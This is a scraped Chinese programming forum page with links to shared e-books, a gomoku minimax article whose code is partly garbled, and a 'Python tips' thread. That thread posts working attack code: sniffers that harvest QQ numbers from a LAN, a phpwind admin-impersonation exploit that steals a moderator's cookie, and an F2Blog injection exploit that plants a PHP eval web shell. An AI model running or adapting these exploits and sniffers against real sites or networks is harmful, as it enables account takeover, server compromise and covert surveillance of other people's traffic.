小小机器人
java资源大合集

http://pan.baidu.com/s/1jGHUKqq 去吧皮卡丘 发的另外一个竟然不能通过 这个比那个资源少了一点

风流小僧
资源失效了
展开Biu

资源失效了

[查看全文]
风流小僧
楼主资源是效率
展开Biu

楼主资源是效率

[查看全文]
dmayq
上去瞧瞧
展开Biu

上去瞧瞧!!!038~

[查看全文]
miqi1992
谢谢楼主分享哈
展开Biu

谢谢楼主分享哈

[查看全文]
Razusa
随手发一个Python的PDF吧~

[postbg]bg8.png[/postbg]Python的用处就不多说了~

最近很发愁那个”本帖隐藏内容需要回复才可见“的属性= =

不知道设置那个的按钮是被神隐了还是我的权限不够用不了= =

而且连hide标签也用不了了T T

好吧 废话不多说了 直接上下载吧~

http://pan.baidu.com/s/1mg0XzQw

hejie115
我在國外
展开Biu

能發到rikkoheki@gmail.com嗎。。。 我在國外 我下載不了 哭uuu

[查看全文]
碳酸氢钠
一直在找这本
展开Biu

一直在找这本,感谢~

[查看全文]
康康丶
感谢分享
展开Biu

感谢分享

[查看全文]
kugaozhanshi
感谢分享
展开Biu

感谢分享

[查看全文]
阑香絮语
感谢分享
展开Biu

感谢分享,还是回复一下啦 我是新手 打算好好看看Python的

[查看全文]
su123456
五子棋的核心算法

五子棋的核心算法

五子棋是一种受大众广泛喜爱的游戏,其规则简单,变化多端,非常富有趣味性和消遣性。这里设计和实现了一个人机对下的五子棋程序,采用了博弈树的方法,应用了剪枝和最大最小树原理进行搜索发现最好的下子位置。介绍五子棋程序的数据结构、评分规则、胜负判断方法和搜索算法过程。

一、相关的数据结构

关于盘面情况的表示,以链表形式表示当前盘面的情况,目的是可以允许用户进行悔棋、回退等操作。

CList StepList;

其中Step结构的表示为:

struct Step

{

int m; //m,n表示两个坐标值

int n;

char side; //side表示下子方

};

以数组形式保存当前盘面的情况,

目的是为了在显示当前盘面情况时使用:

char FiveArea[FIVE_MAX_LINE][FIVE_MAX_LINE];

其中FIVE_MAX_LINE表示盘面最大的行数。

同时由于需要在递归搜索的过程中考虑时间和空间有效性,只找出就当前情况来说相对比较好的几个盘面,而不是对所有的可下子的位置都进行搜索,这里用变量CountList来表示当前搜索中可以选择的所有新的盘面情况对象的集合:

CList CountList;

其中类CBoardSituiton为:

class CBoardSituation

{

CList StepList; //每一步的列表

char FiveArea[FIVE_MAX_LINE][FIVE_MAX_LINE];

struct Step machineStep; //机器所下的那一步

double value; //该种盘面状态所得到的分数

}

二、评分规则

对于下子的重要性评分,需要从六个位置来考虑当前棋局的情况,分别为:-,¦,/,\,//,\\

实际上需要考虑在这六个位置上某一方所形成的子的布局的情况,对于在还没有子的地方落子以后的当前局面的评分,主要是为了说明在这个地方下子的重要性程度,设定了一个简单的规则来表示当前棋面对机器方的分数。

基本的规则如下:

判断是否能成5, 如果是机器方的话给予100000分,如果是人方的话给予-100000 分;

判断是否能成活4或者是双死4或者是死4活3,如果是机器方的话给予10000分,如果是人方的话给予-10000分;

判断是否已成双活3,如果是机器方的话给予5000分,如果是人方的话给予-5000 分;

判断是否成死3活3,如果是机器方的话给予1000分,如果是人方的话给予-1000 分;

判断是否能成死4,如果是机器方的话给予500分,如果是人方的话给予-500分;

判断是否能成单活3,如果是机器方的话给予200分,如果是人方的话给予-200分;

判断是否已成双活2,如果是机器方的话给予100分,如果是人方的话给予-100分;

判断是否能成死3,如果是机器方的话给予50分,如果是人方的话给予-50分;

判断是否能成双活2,如果是机器方的话给予10分,如果是人方的话给予-10分;

判断是否能成活2,如果是机器方的话给予5分,如果是人方的话给予-5分;

判断是否能成死2,如果是机器方的话给予3分,如果是人方的话给予-3分。

实际上对当前的局面按照上面的规则的顺序进行比较,如果满足某一条规则的话,就给该局面打分并保存,然后退出规则的匹配。注意这里的规则是根据一般的下棋规律的一个总结,在实际运行的时候,用户可以添加规则和对评分机制加以修正。

三、胜负判断

实际上,是根据当前最后一个落子的情况来判断胜负的。实际上需要从四个位置判断,以该子为出发点的水平,竖直和两条分别为 45度角和135度角的线,目的是看在这四个方向是否最后落子的一方构成连续五个的棋子,如果是的话,就表示该盘棋局已经分出胜负。具体见下面的图示:

四、搜索算法实现描述

注意下面的核心的算法中的变量currentBoardSituation,表示当前机器最新的盘面情况, CountList表示第一层子节点可以选择的较好的盘面的集合。核心的算法如下:

void MainDealFunction()

{

value=-MAXINT; //对初始根节点的value赋值

CalSeveralGoodPlace(currentBoardSituation,CountList);

//该函数是根据当前的盘面情况来比较得到比较好的可以考虑的几个盘面的情况,可以根据实际的得分情况选取分数比较高的几个盘面,也就是说在第一层节点选择的时候采用贪婪算法,直接找出相对分数比较高的几个形成第一层节点,目的是为了提高搜索速度和防止堆栈溢出。

pos=CountList.GetHeadPosition();

CBoardSituation* pBoard;

for(i=0;ivalue=Search(pBoard,min,value,0);

Value=Select(value,pBoard->value,max);

//取value和pBoard->value中大的赋给根节点

}

for(i=0;ivalue)

//找出那一个得到最高分的盘面

{

currentBoardSituation=pBoard;

PlayerMode=min; //当前下子方改为人

Break;

}

}

其中对于Search函数的表示如下:实际上核心的算法是一个剪枝过程,其中在这个搜索过程中相关的四个参数为:(1)当前棋局情况;(2)当前的下子方,可以是机器(max)或者是人(min);(3)父节点的值oldValue;(4)当前的搜索深度depth。

double Search(CBoardSituation&

board,int mode,double oldvalue,int depth)

{

CList m_DeepList;

if(deptholdvalue))== TRUE)

{

if(mode==max)

value=select(value,search(successor

Board,min,value,depth+1),max);

else

value=select(value,search(successor

Board,max,value,depth+1),min);

}

return value;

}

else

{

if ( goal(board)<>0)

//这里goal(board)<>0表示已经可以分出胜负

return goal(board);

else

return evlation(board);

}

}

注意这里的goal(board)函数是用来判断当前盘面是否可以分出胜负,而evlation(board)是对当前的盘面从机器的角度进行打分。

下面是Select函数的介绍,这个函数的主要目的是根据 PlayerMode情况,即是机器还是用户来返回节点的应有的值。

double Select(double a,double b,int mode)

{

if(a>b && mode==max)¦¦ (a< b && mode==min)

return a;

else

return b;

}

五、小结

在Windows操作系统下,用VC++实现了这个人机对战的五子棋程序。和国内许多只是采用规则或者只是采用简单递归而没有剪枝的那些程序相比,在智力上和时间有效性上都要好于这些程序。同时所讨论的方法和设计过程为用户设计其他的游戏(如象棋和围棋等)提供了一个参考。

裂章0211
挽尊是个技术活
展开Biu

挽尊是个技术活,水贴是个技术活你造吗%1:}

[查看全文]
Alexprototype
掌握介个会成为大师么
展开Biu

asila 发表于 2013-8-5 16:34

这。。掌握介个会成为大师么?o(*^▽^*)o

当然...

并不 = =

算法其实很多种...

****当你会了算法 你还要算runtime哟~~~ 算死你哦~~~@@6!!

[查看全文]
言午许
羽溪
立秋
立秋回复给帖子:13565666
展开Biu

T T看不懂。。闪走~

[查看全文]
假想敵__
我还以为是人脑
展开Biu

。。。。。。我还以为是人脑

[查看全文]
精圆子
Ծ‸Ծ菌子芥
Ծ‸Ծ菌子芥回复给帖子:13565666
展开Biu

高级货~!!!!

点赞~!

[查看全文]
查看更多
浪迹天涯小小牛
欢迎有需要的及时下载

欢迎有需要的及时下载!

如果当时vs
浪迹天涯小小牛
源丶SAMA
我眼瞎了
展开Biu

..........我眼瞎了

[查看全文]
浪迹天涯小小牛
这才一例呢
展开Biu

这只是个截图

[查看全文]
源丶SAMA
这才一例呢
展开Biu

这才一例呢?

[查看全文]
如果当时vs
少年日常大魔王
感谢分享
展开Biu

干货,感谢分享

[查看全文]
balancircle
语言问题
展开Biu

看看这C语言问题

[查看全文]
意志的继承者
我只抱走
展开Biu

好东西 ,我只抱走,不说话。

[查看全文]
凑泊
谢谢楼主分享
展开Biu

谢谢楼主分享

[查看全文]
默瞰
本人初学
展开Biu

本人初学 看看啦

[查看全文]
melxy1997
一定要耗费资源点啊
展开Biu

→_→一定要耗费资源点啊lz……

[查看全文]
你的柔情似水
我觉得这个应该是个好东西
展开Biu

我觉得这个应该是个好东西。

[查看全文]
查看更多
Razusa
再随手发一个SQL Server的PDF吧~(捂脸)

[postbg]1.jpg[/postbg]不知道社区里面玩数据库的大大多不多~

还是先上资源吧~

http://pan.baidu.com/s/1i35htKp

onestepfromhell
好腻害的样子
展开Biu

好腻害的样子= =

捂脸+1

[查看全文]
忽疑君到
正在学中
展开Biu

赞!~\(≧▽≦)/~

SQL正在学中....代码必须坑爹,头大中。

谢楼主~

[查看全文]
Razusa
有点不太懂的样子
展开Biu

lzy199228 发表于 2014-5-25 19:37

有点不太懂的样子

数据库编程啦><

[查看全文]
lzy199228
有点不太懂的样子
展开Biu

有点不太懂的样子

[查看全文]
猫泥特_
标签都不让我加了
展开Biu

Razusa 发表于 2014-5-24 21:56

不行呀 [hide]标签都不让我加了(泪)

2333泪目

来自:IOS客户端

[查看全文]
Razusa
标签都不让我加了
展开Biu

不行呀 [hide]标签都不让我加了(泪)

[查看全文]
猫泥特_
我也不知道呢
展开Biu

Razusa 发表于 2014-5-24 21:42

我也不知道呢 就是没有那个“锁”的按钮=。=

有可能是用户组权限的问题吧大概(摊手) ...

不是前面后面加hide吗?比如

本内容已隐藏,回复后刷新可见哦

[查看全文]
Razusa
初中怎么做程序猿
展开Biu

猫泥特_ 发表于 2014-5-24 21:41

QAQ初中怎么做程序猿,无力~

在学习,主要是自学啦~对于这个非常喜欢,还有在拜师【大概,就是这个概念 ...

我也不知道呢 就是没有那个“锁”的按钮=。=

有可能是用户组权限的问题吧大概(摊手)

[查看全文]
查看更多
Panni_007
找到了一些常用的python开发技巧

本帖最后由 Panni_007 于 2014-1-22 20:06 编辑

推荐大家学习一下python

这些代码,大部分是从别处转来的。搞安全的时候会比较有用。比如数据嗅探,发送请求,正则表达式处理文件,注入测试等。

外国非常流行python 就像咱们学习c一样普及。

国外搞python开发的人很多,公司也很多。国内的相对较少。

我学习这个,是为了玩hack。日常用也很强大。

大多数应用,都可以使用一个函数搞定,比如文件下载,发送请求,分析网页,读写xml,文件压缩,爬虫搜索

1、数据嗅探,这个例子,是嗅探土豆网上的flash真正的播放地址。

[mw_shl_code=python,true]

import pcap ,struct , re

from pickle import dump,load

pack=pcap.pcap()

pack.setfilter('tcp port 80')

regx=r'/[\w+|/]+.flv|/[\w+|/]+.swf'

urls=[]

hosts=[]

print 'start capture....'

for recv_time,recv_data in pack:

urls=re.findall(regx,recv_data);

if(len(urls)!=0):print urls;

[/mw_shl_code]

2、嗅探qq号码,前些天我还用它嗅探局域网里所有的qq那。可惜没有识别性别的功能。不过可以自己添加:

[mw_shl_code=python,true]

# -*- coding: cp936 -*-

import pcap ,struct

pack=pcap.pcap()

pack.setfilter('udp')

key=''

for recv_time,recv_data in pack:

recv_len=len(recv_data)

if recv_len == 102 and recv_data[42]== chr(02) and recv_data[101]== chr(03):

print struct.unpack('>I',recv_data[49:53])[0]

elif recv_len == 55:

print struct.unpack('>I',recv_data[49:53])[0]

[/mw_shl_code]

3、数据嗅探,项目中遇到,需要嗅探一些发送到特定端口的数据,于是花了几分钟写了一个程序。

[mw_shl_code=python,true]

import pcap ,struct

from pickle import dump,load

pack=pcap.pcap()

pack.setfilter('port 2425')

f=open(r'/mm.txt','w+')

print 'start capture....'

for recv_time,recv_data in pack:

print recv_time

print recv_data

f.write(recv_data)

[/mw_shl_code]

4、文件内容搜索,我发现windows的自带的搜索无法搜索内容。即使搜索到也不准。就自己写了一个:

[mw_shl_code=python,true]

import os,string,re,sys

class SevenFile:

files=[]

def FindContent(self,path):

print 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'

walks=os.walk(path)

for walk in walks:

for filename in walk[2]:

if('.mht' == filename[-4:]):

res_taskid=[]

file=walk[0]+'\\'+filename

f=open(file)

content=f.read()

pattern_taskid=re.compile(r'Stonehenge-UIVerificationChecklist\.mht',re.IGNORECASE) #

res_taskid=pattern_taskid.findall(content)

f.close()

if len(res_taskid)>0:

self.files.append(file)

def run():

f=SevenFile()

f.FindContent(r"E:\work\AP\Manual Tests\PSIGTestProject\PSIGTestProject")

for filepath in f.files:

print filepath

print "OK"

if __name__=="__main__":

run()

[/mw_shl_code]

5、这个不是我写的,是一个网上的攻击phpwind论坛的一个代码:[mw_shl_code=python,true]

# -*- coding: gb2312 -*-

import urllib2,httplib,sys

httplib.HTTPConnection.debuglevel = 1

cookies = urllib2.HTTPCookieProcessor()

opener = urllib2.build_opener(cookies)

def banner():

print ""

print "########################################################"

print "Phpwind所有版本管理权限泄露漏洞利用poc"

print "Copyright (C) 2006"

print "jianxin@80sec.com"

print "80sec是一个新的致力于web安全的小团体"

print "http://www.80sec.com"

def usage():

banner()

print "Usage:n"

print " $ ./phpwind.py pwforumurl usertoattackn"

print " pwforumurl 目标论坛地址如http://www.80sec.com/"

print " usertoattack 目标拥有权限的斑竹或管理员"

print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"

print " 最新版本可以使用uid登陆"

print " 其他版本可以使用cookie+useragent登陆"

print "########################################################"

print ""

argvs=sys.argv

usage()

data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")

pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(

url = pwurl ,

headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},

data = data)

f=opener.open(request)

headers=f.headers.dict

cookie=headers["set-cookie"]

try:

if cookie.index('winduser'):

print "Exploit Success!"

print "Login with uid password @80sec or Cookie:"

print cookie

print "User-agent: 80sec owned this"

except:

print "Error! http://www.80sec.com"

print "Connect root#80sec.com"[/mw_shl_code]

[/mw_shl_code]

6、黑客注入攻击,针对指定网站的注入演示:(这个代码貌似有问题)

[mw_shl_code=python,true]

#!c:\python24\pyton

# Exploit For F2Blog All Version

# Author BY MSN:pt...@vip.sina.com

# Date: Jan 29 2007

import sys

import httplib

from urlparse import urlparse

from time import sleep

def injection(realurl,path,evil): #url,/bk/,evilip

cmd=""

cookie=""

header={'Accept':'*/*','Accept-Language':'zh-

cn','Referer':'http://'+realurl[1]+path+'index.php','Content-

Type':'application/x-www-form-urlencoded','User-

Agent':useragent,'Host':realurl[1],'Content-length':len(cmd),

'Connection':'Keep-Alive','X-Forwarded-

For':evil,'Cookie':cookie}

#cmd =

"formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=

%E6%8F%90+%C2%A0+%E4%BA%A4"

#print header

#print path

#sys.exit(1)

http = httplib.HTTPConnection(realurl[1])

http.request("POST",path+"index.php",cmd, header)

sleep(1)

http1 = httplib.HTTPConnection(realurl[1])

http1.request("GET",path+"cache/test11.php")

response = http1.getresponse()

re1 = response.read()

#print re1

print re1.find('test')

if re1.find('test') ==0:

print 'Expoilt Success!\n'

print 'View Your shell:\t%s' %shell

sys.exit(1);

else:

sys.stdout.write("Expoilt FALSE!")

http.close()

#sleep(1)

#break

sys.stdout.write("\n")

def main ():

print 'Exploit For F2Blog All Version'

print 'Codz by pt...@vip.sina.com\n'

if len(sys.argv) == 2:

url = urlparse(sys.argv[1])

if url[2:-1] != '/':

u = url[2] + '/'

else:

u = url[2] #u=/bk/

else:

print "Usage: %s *本站禁止HTML标签噢* " % sys.argv[0]

print "Example: %s http://127.0.0.1/bk" % sys.argv[0]

sys.exit(0)

print '[+] Connect %s' % url[1]

print '[+] Trying...'

print '[+] Plz wait a long long time...'

global shell,useragent

shell="http://"+url[1]+u+"cache/test11.php"

query ='fputs(fopen(\'cache/test11.php\',\'w+\'),\'<?@eval_r($_REQUEST[c])?>test\')'query ='\'));'+query+';/*'

evilip=query

useragent=""

cookie=""

injection(url,u,evilip)

evilip=""

injection(url,u,evilip)

print '[+] Finished'

if __name__ == '__main__': main()

[/mw_shl_code]

7、黑客注入攻击,这是一个完整的access+asp注入工具。

代码有点长,自己下载吧。

http://www.xfocus.net/tools/200408/780.html

国外还有更厉害的python注入工具(sqlmap),支持现在基本上所有的数据库。

[mw_shl_code=shell,false]

MySQL, Oracle, PostgreSQL and Microsoft SQL

Server database management system back-end. Besides these four DBMS,

sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;

[/mw_shl_code]

neuront
进行攻击什么的
展开Biu

用 python 进行攻击什么的, 还是要看对方有没有暴露注入点吧. 另外 py 的 urllib2 跟 httplib 真是简单到爆, 随手抓网页什么的不在话下, 结合正则表达式或 xml 模块分析页面内容相当好用.

顺便吐个槽, 楼主导了 pickle 模块却没用到... 这个模块是用来把 py 对象写成二进制数据 (dump) 或反之 (load). 不过在 Web 日益发达的今天, 这种事情一般都用 json 来搞了.

[查看全文]
xupijack
我也是剛開始學
展开Biu

哈哈 我也是剛開始學!!!

收藏先! 謝謝

[查看全文]
foxwood16
刚刚开始学
展开Biu

= =|||刚刚开始学,先收藏了

[查看全文]
甲板上的Kidd
Windows程序设计第五版-英文原版

XDAPI入门必读。大概是我语死早看着翻译版不习惯,个人认为英文版反而学的还快点儿。

也不知道有没有人发这玩意,先放上。

p.s. 由于从外网下载以后就是受保护模式,所以很遗憾地没法在PDF上面涂涂画画;w;

[hide=d365]链接: http://pan.baidu.com/s/1dDmW1UD 密码: ssln[/hide]